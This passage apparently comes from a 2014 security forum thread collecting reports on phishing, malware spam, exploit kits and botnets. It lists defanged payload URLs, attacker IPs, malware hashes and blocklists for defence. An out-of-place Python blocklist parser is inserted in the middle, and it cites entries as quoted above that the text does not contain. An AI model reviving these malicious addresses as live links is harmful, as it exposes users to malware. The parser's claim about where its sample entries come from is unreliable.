Public exploit code has been released for a 14 month old vulnerability in a large number of Android devices. The exploit code is trivial to use and is freely available in the Metasploit Framework.
Analysis: The slow update cycle for Android devices is a serious security consideration. Combining the risks of the typical BYOD work environment and the popularity of accessing enterprise resources with personal devices, such publicly released exploit code will make it easier for targeted attacks to leverage a compromised Android device in attack campaigns. The video that demonstrates the exploit shows the -malicious- URL being delivered to the device in the form of a QR code - an attack vector previously discussed but rarely observed... Apparently using an alternate browser other than the built-in Android browser (based on WebView) such as Google Chrome will -mitigate- this vulnerability, however many users are likely to be taking advantage of the default configuration which includes a WebView based browser...
Source: http://arstechnica.com/security/2014/02/e-z-2-use-attack-code-exploits-critical-bug-in-majority-of-android-phones/

:fear: :mad:

AplusWebMaster
2014-02-24, 15:48
FYI...

Fake PayPal email - wants card details ...
- http://blog.malwarebytes.org/fraud-scam/2014/02/fake-paypal-survey-program-email-wants-card-details/
Feb 24, 2014 - "Be wary of emails bearing gifts – in this case, claiming to reward those who would fill in a so-called Paypal survey to obtain a “£25 reward”. This one is flagged as -spam- in Gmail, but depending on your mail provider it may creep into the Inbox instead of the Spam folder:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/paypalsurveyspam1.jpg
... The zipfile, online_form.zip, contains a .htm page which looks like this:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/paypalsurveyspam2.jpg
Underneath the entirely pointless “survey questions”, the form asks for name, address, city, postcode, birthday, the “£25 bonus code” and full debit card information which all sits above a handy “Submit” button (top tip: -don’t- hit the submit button). While the people sending this mail have presumably tried to panic recipients into replying quickly (that is one seriously tight deadline), they may find this backfires as would-be victims see “23 February 2014” and send it straight to the trash. Take note of the following advice from the PayPal Security Center*:
* https://www.paypal.com/c2/cgi-bin/webscr?cmd=xpt/Marketing/securitycenter/general/UnderstandPhishing-outside
"To help you better identify fake emails, we follow strict rules. We will -never- ask for the following personal information in email:
Credit and debit card numbers
Bank account numbers
Driver’s license numbers
Email addresses
Passwords
Your full name”
If it sounds too good to be true…"
___

Pony botnet steals bitcoins, digital currencies
- http://blog.spiderlabs.com/2014/02/look-what-i-found-pony-is-after-your-coins.html
Feb 24, 2014 - "... discovered yet another instance of a Pony botnet controller. Not only did this Pony botnet steal credentials for approximately 700,000 accounts, it’s also more advanced and collected approximately $220,000 (all values in this post will be in U.S. dollars) worth, at time of writing, of virtual currencies such as BitCoin (BTC), LiteCoin (LTC), FeatherCoin (FTC) and 27 others. According to our data, the cyber gang that was operating this Pony botnet was active between September 2013 and mid-January 2014. In this ~4 month period, the botnet managed to steal over 700,000 credentials, distributed as follows:
~600,000 website login credentials stolen
~100,000 email account credentials stolen
~16,000 FTP account credentials stolen
~900 Secure Shell account credentials stolen
~800 Remote Desktop credentials stolen
... the one thing you need to know is that BitCoins are stored in virtual wallets, which are essentially pairs of private and public keys. Whoever holds the private key to a wallet is the owner of that wallet and no name, ID or history is associated with the wallet. Again, possession of the private key indicates ownership. This holds true for all the other digital currencies that grew from BTC and now live alongside it—the most popular alternative right now being LiteCoin. BTC started out as an underground currency... The value of a BitCoin fluctuates. As of February 24; a BitCoin is valued at approximately $600. Unfortunately, even though some people may have had more money in their virtual wallet than they did in their bank account, very few had the understanding of how to properly secure their wallets... cybercriminals began developing ways to steal BitCoins, each within their own field of expertise. The most obvious choice for an attacker is to go after websites that offer various trading services. Many of these websites store virtual wallets for their users. A number of attacks on trading websites have popped-up over time. One of the most famous attacks on a trading website was the Sheep Marketplace scam** because of the large amount of BTC stolen... the bots interacted directly with the command-and-control server, which provided us with a little more insight into the geographical distribution of the victims:
Stolen passwords geo location distribution
> http://a7.typepad.com/6a0168e94917b4970c01a73d793ddf970d-pi
... most popular websites for which credentials were stolen...
Stolen passwords by domains
> http://a5.typepad.com/6a0168e94917b4970c01a5116de6e5970c-pi
If you’d like to check your credentials, we’ve created a web tool that will allow you to enter your e-mail address to see whether it was included in the data cache. The tool will only send an e-mail to the address you input... You can find the tool here*..."
* https://www3.trustwave.com/support/labs/check-compromised-email.asp

** http://thehackernews.com/2013/12/Sheep-Marketplace-scam-Bitcoin-stolen-Silk-Road.html

:fear: :mad:

AplusWebMaster
2014-02-25, 17:04
FYI...

Fake Westpac Bill Payment - Phish
- http://www.hoax-slayer.com/westpac-bill-payment-processed-phishing-scam.shtml
Feb 25, 2014 - "Message supposedly sent by Australian bank Westpac, notifies recipients that a payment to a biller has been successfully processed and invites them to click a link to view transaction details. Westpac did -not- send the email. The message is a phishing scam that attempts to lure Westpac customers into visiting a fraudulent website and providing their account login details. Criminals will use the stolen information to hijack Westpac bank accounts belonging to their victims.
Example:
> http://www.hoax-slayer.com/images/westpac-payment-processed-phishing-2014-1.jpg
This email, which was supposedly sent by large Australian bank Westpac, informs recipients that a payment to a biller has been successfully processed. The email includes details of the bill payment and invites recipients to follow a link to view more information about the transaction. The message includes the Westpac logo... It is a -phishing- scam that was created with the goal of tricking recipients into giving their Westpac account login details to cybercriminals. Some Westpac customers who receive the bogus notification may be panicked into clicking the link in the mistaken belief that their accounts have been compromised and used to conduct fraudulent transactions in their names... the criminals responsible for the phishing campaign will collect the submitted login credentials. The criminals can use the stolen credentials to access their victims' bank accounts, transfer funds and commit further fraudulent transactions. If you receive one of these emails, do -not- click any links -or- open any attachments that it contains. Westpac has published information about phishing scams and how to report them on its website*..."
* http://www.westpac.com.au/security/fraud-and-scams/online-fraud/
___

Fake British Airways e-ticket email - malware ...
- http://www.welivesecurity.com/2014/02/25/british-airways-e-ticket-malware-attack-launched-via-email/
Feb 25, 2014 - "If you have received an unexpected email, claiming to come from British Airways, about an upcoming flight that you haven’t booked – please be on your guard. Online criminals are attempting to infect innocent users’ computers with a variant of the malicious Win32/Spy.Zbot.AAU trojan, by disguising their attack as an e-ticket from the airline. To maximise the potential number of victims, the attackers have spammed out messages widely from compromised computers.
> http://www.welivesecurity.com/wp-content/uploads/2014/02/ba-malware-email.jpeg
... Of course, although the email claims to come from British Airways – it is nothing of the sort. In a classic example of social engineering, criminals are hoping that email recipients will worry that their credit card has been fraudulently used to purchase an air ticket, and click on links inside the email to find out more. However, if users download the supposed e-ticket and launch its contents, they will be infecting themselves with a trojan horse that can spy on their computer activity and give malicious hackers third-party access to their data... the malware has been spread via malicious links after cybercriminals forged email headers to make their messages look like they really came from British Airways’s customer service department. But it’s equally possible for attackers to spread their malware via email attachments, or for other disguises to be deployed if those behind the spam blitz believe that they have a greater chance of success. Remember to always be suspicious of clicking on links in unsolicited emails, and the social engineering tricks that are frequently used to lure computer users into making unwise decisions..."
___

WhatsApp desktop client doesn’t exist, used in Spam Attack anyway
- http://blog.trendmicro.com/trendlabs-security-intelligence/whatsapp-desktop-client-doesnt-exist-used-in-spam-attack-anyway/
Feb 25, 2014 - "The popular messaging application WhatsApp recently made headlines when it was acquired by Facebook... Cybercriminals didn’t waste much time to capitalize on this bit of news: barely a week after the official announcement, we saw a spam attack that claims that a desktop version of the popular mobile app is now being tested.
Screenshot of spammed message:
> http://about-threats.trendmicro.com/resources/images/02232014_facebookspam.jpg
... The message also provides a download link to this version, which is detected as TROJ_BANLOAD.YZV, which is commonly used to download banking malware. (This behavior is the same, whether on PCs or mobile devices). That is the case here; TSPY_BANKER.YZV is downloaded onto the system. This BANKER variant retrieves user names and passwords stored in the system, which poses a security risk for online accounts accessed on the affected system. The use of BANKER malware, coupled with a Portuguese message, indicates that the intended targets are users in Brazil. Feedback from the Smart Protection Network indicates that more than 80 percent of users who have accessed the malicious site do come from Brazil. Although the volume of this spam run is relatively low, it is currently increasing. One of our spam sources reported that samples of this run accounted for up to 3% of all mail seen by that particular source, which indicates a potential spam outbreak. We strongly advise users to be careful of this or similar messages; WhatsApp does -not- currently have a Windows or Mac client, so all messages that claim one exists can be considered -scams- ..."
___

Bitcoin exchange Mt. Gox disappears...
- http://www.reuters.com/article/2014/02/25/us-mtgox-website-idUSBREA1O07920140225
Feb 25, 2014 - "Mt. Gox, once the world's biggest bitcoin exchange, looked to have essentially disappeared on Tuesday, with its website down, its founder unaccounted for and a Tokyo office empty bar a handful of protesters saying they had lost money investing in the virtual currency. The digital marketplace operator, which began as a venue for trading cards, had surged to the top of the bitcoin world, but critics - from rival exchanges to burned investors - said Mt. Gox had long been lax over its security. It was not clear what has become of the exchange, which this month halted withdrawals indefinitely after detecting "unusual activity." A global bitcoin organization referred to the exchange's "exit," while angry investors questioned whether it was still solvent..."
- http://www.wired.com/wiredenterprise/2014/02/bitcoins-mt-gox-implodes/
___

Developers attack code bypasses MS EMET tool
- http://arstechnica.com/security/2014/02/new-attack-completely-bypasses-microsoft-zero-day-protection-app/
Feb 24, 2014 - "Researchers have developed attack code that completely bypasses Microsoft's zero-day prevention software, an impressive feat that suggests criminal hackers are able to do the same thing when exploiting vulnerabilities that allow them to surreptitiously install malware. The exploit code, which was developed by researchers from security firm Bromium Labs, bypasses each of the many protections included in the freely available EMET, which is short for Enhanced Mitigation Experience Toolkit... The Bromium exploit included an example of a real-world attack that was able to circumvent techniques designed to mitigate the damage malicious code can do when targeting security bugs included in third-party applications... The researchers privately informed security personnel at Microsoft before going public with their findings; the software giant plans to credit the research when releasing the upcoming version 5 of EMET..."

:fear::fear: :mad:

AplusWebMaster
2014-02-26, 16:53
FYI...

Fake AMEX email - phish ...
- http://www.hoax-slayer.com/amex-personal-security-key-phishing-scam.shtml
Feb 26, 2014 - "Email claiming to be from American Express instructs recipients to visit a website and create a Personal Security Key (PSK) as an account authentication measure. The email is -not- from American Express. Links in the email open a fraudulent website designed to emulate a genuine American Express webpage. The fake website asks users to provide credit card details and other information. The criminals behind the scam will use the stolen data to commit credit card fraud and hijack online accounts. If this message comes your way, do -not- click on any links -or- open any attachments that it contains.
> http://www.hoax-slayer.com/images/amex-psk-phishing-1.jpg
According to this email, which purports to be from American Express, users can increase their account security by having a Personal Security Key (PSK). The message invites recipients to click a link to create their PSK. The email is professionally presented and includes seemingly legitimate subscription and copyright information. At first glance, the message may seem like a genuine American Express notification, especially since it supposedly provides information to help customers protect themselves from fraud. American Express does offer customers a PSK system as one of several authentication measures. However, this email is not from American Express. Ironically, considering its content, the email is itself a scam designed to defraud customers. Clicking any of the links in the fake message will take users to a bogus website that asks for their credit card information. Like the email itself, the bogus website looks professional and has been built so that it closely emulates a genuine American Express page. The information provided on the fake website can be collected by scammers and used to commit credit card fraud and identity theft... scammers are likely to create new scam sites and send out more of the scam emails. Phishing scammers continually target American Express and other credit card providers. As such scams go, this is a quite sophisticated attempt. Because of the way it is presented, the scam may catch out even more experienced users. American Express will -never- send customers unsolicited emails that request them to provide their card details or other sensitive personal information by clicking a link. The American Express website* includes information about phishing and how to report scam emails."
* https://www.americanexpress.com/us/content/fraud-protection-center/identity-theft.html
___

Android - 98% of all mobile malware targeted this platform...
- https://www.securelist.com/en/analysis/204792326/Mobile_Malware_Evolution_2013#05
24 Feb 2014 - "... Android remains a prime target for -malicious- attacks. 98.05% of all malware detected in 2013 targeted this platform, confirming both the popularity of this mobile OS and the vulnerability of its architecture..."
Charted: https://www.securelist.com/en/images/vlill/mobile_treats_2013_02.png

- http://www.theinquirer.net/inquirer/news/2331127/android-is-target-for-98-percent-of-all-mobile-malware
Feb 26 2014 - "... the number of new malicious programs in 2013 -doubled- to over 100,000... The bulk of attacks, 40 percent, target people in Russia. The UK ranks fifth, with three percent of victims. Germany, which lurks just below the UK, is apparently rather susceptible to a premium charge SMS takeover attack... that is unlikely to last for long: given cybercriminals' keen interest in consumer bank accounts, the activity of mobile banking Trojans is expected to grow in other countries in 2014..."
___

Eviction Notice Spam
- http://threattrack.tumblr.com/post/77923990772/eviction-notice-spam
Feb 26, 2014 - "Subjects Seen:
Eviction Notice
Typical e-mail details:
Urgent notice of eviction,
We have to inform you about the eviction proceedings against
you and the decision of the bank to foreclose on your property.
As a trespasser you need to move out until 20 March 2014
and leave the property empty of your belongings and any trash.
Please contact our office without delay to make arrangements for a move out.
If you do not do this, you could be simply locked out of your home.
Detailed bank statement as well as our contact information
can be found in the attachment to this notice.
Real estate agency,
Helen Tailor

Malicious File Name and MD5:
Notice_of_eviction_id65697RE.zip (26660A4FEB6D13BA67BFDBEF486A36FD)
Urgent_notice_of_eviction.exe (1B7E61B48866A523BF5618F266AC5600)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f8be68f04b21ceab153a52b83b677b8e/tumblr_inline_n1m96h2f2Y1r6pupn.png

Tagged: Eviction Notice, Kuluoz

:fear::fear: :mad:

AplusWebMaster
2014-02-27, 12:57
FYI...

Fake Amazon SPAM / 213.152.26.150
- http://blog.dynamoo.com/2014/02/amazoncom-important-for-your-online.html
27 Feb 2014 - "This fake Amazon spam leads to something bad.
Date: Wed, 26 Feb 2014 13:09:55 -0400 [02/26/14 12:09:55 EST]
From: "Amazon.com" [t1na@ msn .com]
Subject: Important For Your Online Account Access .
Your Account Has Been Held
Dear Customer ,
We take you to note that your account has been suspended for protection , Where the password was entered more than once .
In order to protect ,account has been suspended .Please update your Account Information To verify the account...
Thanks for Update at Amazon .com...

Screenshot: https://lh3.ggpht.com/-I0pRhOGLLtA/Uw8FkamDDfI/AAAAAAAACp8/4wyArLqOV5o/s1600/amazon2.png

In the samples that I have seen the link in the email goes to either [donotclick]exivenca .com/support.php or [donotclick]vicorpseguridad .com/support.php both of which are currently -down- but were both legitimate sites hosted on 213.152.26.150 (Neo Telecoms, France). The fact that these sites are down could be because the host is dealing with the problem, however I would expect to see this same email template being used again in the future, so take care.."
___

Fake Royal Mail SPAM
- http://blog.dynamoo.com/2014/02/royal-mail-shipping-advisory-spam.html
27 Feb 2014 - "This -fake- Royal Mail spam has a malicious payload:
From: Royal Mail noreply@ royalmail .com
Date: 27 February 2014 14:50
Subject: Royal Mail Shipping Advisory, Thu, 27 Feb 2014
Royal Mail Group Shipment Advisory
The following 1 piece(s) have been sent via Royal Mail on Thu, 27 Feb 2014 15:47:17 +0530, REF# GB36187692IE ...

Screenshot: https://lh3.ggpht.com/-Uwr252R1CT4/Uw9U1uFE1NI/AAAAAAAACq8/qAUAaBpcaYI/s1600/royalmail.png

This is a ThreeScripts attack, the link in the email goes to:
[donotclick]wagesforinterns .com/concern/index.html
and it then runs one or more of the following scripts:
[donotclick]billigast-el .nu/margarita/garlicky.js
[donotclick]ftp.arearealestate .com/telecasted/earners.js
[donotclick]tattitude .co .uk/combines/cartooning.js
in this case the payload site is at
[donotclick]northwesternfoods .com/sg3oyoe0v2
which is hosted on 23.239.12.68 (Linode, US) along with a bunch of hijacked GoDaddy sites... The payload appears to be an Angler Exploit Kit (see this example*).
Recommended blocklist:
23.239.12.68
billigast-el .nu
ftp.arearealestate .com
tattitude .co .uk
n2ocompanies .com
northerningredients .com
northwesternfoods .com
oziama .com
oziama .net "
* http://urlquery.net/report.php?id=9660606

:fear::fear:
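
The recommended blocklists in the dynamoo posts above mix a CIDR range, bare IPs and domains defanged with a space before each dot ("tattitude .co .uk"). The following parses that format, checks IPs against the ranges and names against the domains (subdomains included), and emits unbound local-zone lines; it is an added example rather than the blog's own tooling, and the sample list is assembled from entries quoted in the Royal Mail and Android-malware posts above.

```python
"""Parse the defanged 'Recommended blocklist' format quoted above and turn it
into lookups and resolver config.  Added example, not dynamoo's tooling."""
import ipaddress
import re
from typing import List, Tuple

# Constructed from entries quoted in the posts above; the trailing quote is
# kept deliberately because the forum paste ends each list that way.
SAMPLE_BLOCKLIST = """
5.61.32.0/20
23.239.12.68
billigast-el .nu
ftp.arearealestate .com
tattitude .co .uk
350600700200 .ru
northwesternfoods .com "
"""

# Hostname: labels of 1-63 chars, alphabetic TLD, 253 chars overall.
DOMAIN_RE = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$")


def refang(token: str) -> str:
    """Undo the '[donotclick]', 'hxxp', '[.]' and ' .' defanging styles used in the posts."""
    t = token.strip().strip('"').strip().lower()
    t = t.replace("[donotclick]", "")
    t = re.sub(r"^hxxps?://", "", t)
    for defanged_dot in ("[.]", "(.)", " .", ". "):
        t = t.replace(defanged_dot, ".")
    return t.strip().rstrip(".")


def parse_blocklist(text: str) -> Tuple[list, List[str], List[str]]:
    """Split into IP networks (bare IPs become /32), domains, and rejected lines."""
    nets, domains, rejected = [], [], []
    for raw in text.splitlines():
        item = refang(raw)
        if not item or item.startswith("#"):
            continue
        try:
            nets.append(ipaddress.ip_network(item, strict=False))
            continue
        except ValueError:
            pass  # not an IP or CIDR, try it as a hostname
        if DOMAIN_RE.match(item):
            domains.append(item)
        else:
            rejected.append(raw)  # keep the original line so an analyst can eyeball it
    return nets, domains, rejected


def ip_blocked(ip: str, nets) -> bool:
    """True when the address falls inside any listed network."""
    addr = ipaddress.ip_address(ip)
    return any(addr in n for n in nets)


def domain_blocked(name: str, domains) -> bool:
    """True for a listed name or any subdomain of it; the posts note abuse of
    subdomains under hijacked domains, so a suffix match is what is wanted."""
    n = refang(name)
    return any(n == d or n.endswith("." + d) for d in domains)


def to_unbound(domains) -> List[str]:
    """unbound.conf lines answering NXDOMAIN for the zone and everything below it."""
    return [f'local-zone: "{d}." always_nxdomain' for d in domains]


if __name__ == "__main__":
    nets, domains, rejected = parse_blocklist(SAMPLE_BLOCKLIST)
    print("networks:", [str(n) for n in nets])
    print("domains:", domains, "rejected:", rejected)
    print("\n".join(to_unbound(domains)))
```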

AplusWebMaster
2014-02-28, 13:36
FYI...

IE10 0-day exploited in widespread Drive-by Downloads
- http://www.symantec.com/connect/blogs/internet-explorer-10-zero-day-vulnerability-exploited-widespread-drive-downloads
Updated: 27 Feb 2014 - "... We’ve observed trends suggesting that attacks targeting this vulnerability are no longer confined to advanced persistent threats (APT) — the zero-day attacks are expanding to attack average Internet users as well. We refer to these attacks as drive-by downloads. This is not a surprising result, as the vulnerability’s exploit code received a lot of exposure, allowing anyone to acquire the code and re-use it for their own purposes. Our internal telemetry shows a big uptick in attempted zero-day attacks. The attacks started to increase dramatically from February 22, targeting users in many parts of the world. Our telemetry shows -both- targeted attacks and drive-by downloads in the mix.
Attacks targeting CVE-2014-0322 around the world
> http://www.symantec.com/connect/sites/default/files/users/user-2551621/IE%2010%20zero%20day%201.png
... websites either were modified to host the exploit code for the Internet Explorer zero-day vulnerability or were updated with the insertion of an iframe that redirects the browser to another compromised site hosting the exploit code. If the attack is successful, the exploit drops a banking Trojan that steals login details from certain banks... Microsoft has yet to provide a security update to patch the affected vulnerability. However, the company has offered the following solutions to help users protect their computers from exploits that take advantage of this vulnerability:
- Upgrade to Internet Explorer 11
- Install the Microsoft Fix it workaround solution:
> http://support.microsoft.com/kb/2934088#FixItForMe "
___

Fake Netflix Phish leads to Fake MS Tech Support
- http://blog.malwarebytes.org/fraud-scam/2014/02/netflix-phishing-scam-leads-to-fake-microsoft-tech-support/
Feb 28, 2014 - "... came across what I first thought was a typical phishing scam targeting Netflix:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/signin.png
Until I realized it wasn’t, or at least that there was something more to it. Of course it stole my credentials:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/phish.png
But it also displayed a message saying my account had been suspended:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/suspended.png
In order to fix this issue, you are urged to call “Netflix” at a 1-800 number. If you do a bit of a search you will find out this is -not- the official hotline, so this warranted a deeper investigation. Once I called the number, the rogue support representative had me download a “NetFlix Support Software”:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/software.png
This is nothing else but the popular remote login program TeamViewer:
> http://cdn.blog.malwarebytes.org/wp-content/uploads/2014/02/downloads.png
After remotely connecting to my PC, the scammer told me that my Netflix account had been suspended because of illegal activity. This was supposedly due to hackers who had infiltrated my computer as he went on to show me the scan results from their own ‘Foreign IP Tracer’, a -fraudulent- custom-made Windows batch script... According to him, there was only one thing to do: To let a Microsoft Certified Technician fix my computer. He drafted a quick invoice and was kind enough to give me a $50 Netflix coupon (fake of course) before transferring me to another technician... During our conversation, the scammers were not idle. They were going through my personal files and uploading those that looked interesting to them, such as ‘banking 2013.doc‘... Another peculiar thing is when they asked me for a picture ID and a photo of my credit card since the Internet is not secure and they needed proof of my identity. I could not produce one, therefore they activated my webcam so that I could show said cards to them onto their screen... This is where it ended as my camera was disabled by default. The scammers were located in India, information gathered from the TeamViewer logfile... -never- let anyone take remote control of your computer unless you absolutely trust them. This scam took place in a controlled environment that had been set up specifically for that purpose..."

:fear::fear:

AplusWebMaster
2014-03-01, 14:16
FYI...

The ThreatCon is currently at Level 2: Elevated
- http://www.symantec.com/security_response/threatconlearn.jsp
Mar 2, 2014 - "On February 19, 2014, Microsoft released a security advisory confirming limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 9 and 10. The exploit is now being used in mass attacks. Customers are advised to update to Internet Explorer 11 or apply the Microsoft Fix it* solution described in the Microsoft Security Advisory. A security patch has yet to be released.
Microsoft Security Advisory (2934088) Vulnerability in Internet Explorer Could Allow Remote Code Execution"
* http://support.microsoft.com/kb/2934088#FixItForMe

> http://www.netmarketshare.com/browser-market-share.aspx?qprid=0&qpcustomd=0
Feb 2014 - IE: 58%
___

Fake Companies House SPAM
- http://blog.dynamoo.com/2014/02/companies-house-fw-case-6569670-spam.html
28 Feb 2014 - "This -fake- Companies House spam leads to malware:
From: Companieshouse.gov.uk [web-filing@companies-house .gov .uk]
Date: 28 February 2014 12:55
Subject: Spam FW: Case - 6569670
A company complaint was submitted to Companies House website.
The submission number is 6569670
For more details please click : https ://companieshouse .gov .uk/Case?=6569670
Please quote this number in any communications with Companies House.
All Web Filed documents are available to view / download for 10 days after their
original submission. However it is not possible to view copies of accounts that
were downloaded as templates.
Companies House Executive Agency may use information it holds to prevent
and detect fraud. We may also share such information, for the same purpose,
with other organisations that handle public funds.
If you have any queries please contact the Companies House Contact Centre ...

Screenshot: https://lh3.ggpht.com/-_WHfOqxcvGU/UxCsGiLDt5I/AAAAAAAACro/R7Ysn-oY3CA/s1600/companies-house-4.png

The link in the email goes to:
[donotclick]economysquareshoppingcenter .com/izmir/index.html
in turn this runs one or more of the following scripts:
[donotclick]homedecorgifts .biz/outfitted/mascara.js
[donotclick]www.coffeemachinestorent .co.uk/disusing/boas.js
[donotclick]citystant .com/trails/pulitzer.js
[donotclick]rccol.pytalhost .de/turban/cupped.js
which in turn leads to a payload site at:
[donotclick]digitec-brasil .com.br/javachecker.php?create=3019&void-cat=4467&first-desk=9002
According to this URLquery report*, the payload site has some sort of Java exploit.
Recommended blocklist:
digitec-brasil .com.br
homedecorgifts .biz
coffeemachinestorent .co.uk
citystant .com
rccol.pytalhost .de "
* http://urlquery.net/report.php?id=9706278
___

Fake Urgent eviction notification - Asprox...
- http://stopmalvertising.com/spam-scams/urgent-eviction-notification-a-deeper-dive-into-the-asprox-ecosystem.html
Feb 28, 2014 - "The latest Asprox / Kuluoz spam template consists of an unsolicited email appearing to be from ppmrental .com. Prospectors Property Management is a Real Estate Agency located in Morgan Hill, California. The emails arrive with the subject line "Urgent eviction notification". The spammed out message notifies the recipient that as a trespasser they need to move out from their property before the 21 March 2014 and leave the property empty of their belongings and trash. The addressee must contact the Real Estate without delay in order to make arrangements to move out. Failure to do so could result in being locked out of the house. A detailed bank statement as well as the Real Estate's contact information can be found in the attachment. The executable file inside the ZIP archive poses as a Microsoft Word Document. This is one of the main reasons why you should never trust a file by its icon. Make sure that Windows Explorer is set to show file extensions and always pay attention to the file extension instead. The payload, Urgent_notice_of_eviction.exe will start up an instance of svchost.exe before accessing the internet. A copy of the executable will be copied under a random name to the %User Profile%\Local Settings\Application Data folder. A small downloader - bqoqusgj.exe in our analysis - will be fetched from the C&C together with 3 other files:
vbxghrke - 66.5 KB (68,161 bytes)
kqrbfxel - 12.0 KB (12,326 bytes)
ihxqgwcu.exe - 140 KB (143,360 bytes)
A new start up entry will be created for ihxqgwcu.exe so that the program starts each time Windows starts but the executable isn’t launched yet. In the meantime bqoqusgj.exe will download two files posing as Updates for the Flash Player: updateflashplayer_9e26d2b2.exe (libs5.8/jquery directory) and UpdateFlashPlayer_266a0199.exe (libs5.8/ajax directory).
> http://stopmalvertising.com/research/images/asprox-infogram1.jpg
... Updateflashplayer_9e26d2b2.exe will instantly shutdown and reboot the computer. A series of error messages will appear upon reboot as the malicious binary has deleted several critical registry keys belonging to Antivirus / Firewall / HIPS applications...The Asprox ad fraud binary also makes sure that the computer can’t boot in Safe Mode by deleting the corresponding registry entries. As seen below, booting the computer in safe mode results in a blue screen.
> http://stopmalvertising.com/research/images/asprox-infogram2.jpg
... For an in-depth analysis of Asprox / Kuluoz please refer to: Analysis of Asprox and its New Encryption Scheme*... Email:
> http://stopmalvertising.com/research/images/asprox-infogram10.jpg
... IP Details
46.161.41.154
37.221.168.50
109.163.239.243 ...
14.54.223.133
37.193.48.182 (504)
37.115.155.128
72.227.178.35
90.154.249.71
91.225.93.237
100.2.223.97
109.226.203.101
176.212.145.163
188.129.241.164
213.231.48.242 ..."
(More detail at the stopmalvertising URL above.)
* http://stopmalvertising.com/malware-reports/analysis-of-asprox-and-its-new-encryption-scheme.html

- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=33147
2014 Mar 03

:mad: :fear:

AplusWebMaster
2014-03-03, 13:43
FYI...

Malware sites to block ...
- http://blog.dynamoo.com/2014/03/malware-sites-to-block-2314.html
2 Mar 2014 - "These domains and IPs are all connected with this gang*, some of it appears to be involved in -malware- distribution, -fraud- or other illegal activities. I recommend that you -block- these IPs and domains. Note that some of the IPs listed below are compromised nameservers (marked [ns]) which look like they are insufficiently well locked down. There is a plain list of IPs at the end for copy-and-pasting..."
(Long list at the URL above.)
* http://blog.dynamoo.com/2014/03/seekcousacom-seekconzcom-fake-job-offer.html
2 Mar 2014
___

Rising use of Malicious Java Code ...
- https://www.trusteer.com/blog/rising-use-of-malicious-java-code-for-enterprise-infiltration-0
Mar 3, 2014 - "... exploit kits such as the Blackhole and Cool exploit kit were found to be using unpatched Java vulnerabilities... to install malware..."
Extract from the 2014 IBM X-Force Threat Intelligence Quarterly report
Exploited apps - Dec 2013
> https://www.trusteer.com/sites/default/files/ScreenShot609.png
Java vulnerabilities - 2010-2013
> https://www.trusteer.com/sites/default/files/ScreenShot610.png

:mad: :fear:

AplusWebMaster
2014-03-04, 14:16
FYI...

Phone Phishing, Data Breaches, and Banking Scams
- http://blog.trendmicro.com/trendlabs-security-intelligence/phone-phishing-data-breaches-and-banking-scams/
Mar 4, 2014 - "... I received a rather unusual call that claimed to be from National Australia Bank (NAB), one of the four largest banks in Australia. The caller had my complete name and my address. They claimed that they had flagged a suspicious transaction from my account to an Alex Smith in New Zealand to the tune of 700 Australian dollars. They needed my NAB number to confirm if the transaction was legitimate. There was just one problem with this seemingly plausible call: I wasn’t an NAB customer. I offered to call them back – and when I did so, they simply hung up on me. These sorts of calls are not the only threats that arrive via phone – for example, fake “support” calls that are supposedly from Microsoft* that offer to remove malware from user PCs are sadly commonplace. To most users who simply go about their daily lives, these calls can sound quite convincing and can cause a lot of problems... How did they get all that information? We don’t know. However, it’s very possible that somebody somewhere had a data breach. They may not have known about it, or they may have decided that since the information “wasn’t critical” – say, they didn’t have my credit card or banking credentials – that it was harmless. However, now you can see how seemingly “harmless” information can be used to carry out real fraud. Since last year, we’ve been pointing out the huge gains in banking malware**. Just as support scams can be thought of as a “real-world” equivalent to ransomware and fake antivirus, so can these sort of phishing calls be the equivalent of these banking malware threats..."
* http://www.microsoft.com/security/online-privacy/msname.aspx

** http://blog.trendmicro.com/trendlabs-security-intelligence/2013-security-roundup/
___

Twitter sends password reset emails by mistake, admits it wasn't hacked
- http://www.theinquirer.net/inquirer/news/2332034/twitter-sends-password-reset-emails-by-mistake-promises-it-hasnt-been-hacked
Mar 04 2014 - "... Twitter sent a number of password reset emails on Monday evening due to a system error. The firm contacted users with the sort of messages usually seen when attackers are taking over accounts. Twitter's email has been shared on the microblogging website, of course, and picked up by the Recode website. The missive presented itself as one of those 'you've been hacked' emails, and informed users about their scorched logins. "Twitter believes that your account may have been compromised by a website or service not associated with Twitter," it said. "We've reset your password to prevent accessing your account." Users took to Twitter to fret about the email, and a search on "Twitter hack" turns up a range of panicked missives and messages of thanks to Twitter for its speedy intervention. Later though, in a statement to Recode, the firm admitted that it had been the victim of nothing more than a system error. "We unintentionally sent some password reset notices tonight due to a system error," it said. "We apologise to the affected users for the inconvenience." Users could not be blamed for worrying about the phantom attack, as we have already seen a large number of security breaches this year..."
___

Orange MMS Message Spam
- http://threattrack.tumblr.com/post/78565844188/orange-mms-message-spam
Mar 4, 2014 - "Subjects Seen:
MMS message from: +447974******
Typical e-mail details:
You have received MMS message from: +447974778589
You can find the contents of the message in the attachment
If you have any questions regarding this automated message please contact Orange Customer Support

Malicious File Name and MD5:
MMS_C0BFB6C0B8.zip (3A123E39BDCAC7ED1127206502C1598C)
MMS_87436598.exe (10F21C0F2C3C587A509590FA467F8775)

Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d6ffde2f5ab5fd87acf75fa8676729f2/tumblr_inline_n1xe68fhjQ1r6pupn.png

Tagged: Orange, Androm
___

Bitcoin bank Flexcoin shuts down after theft
- http://www.reuters.com/article/2014/03/04/us-bitcoin-flexcoin-idUSBREA2329B20140304
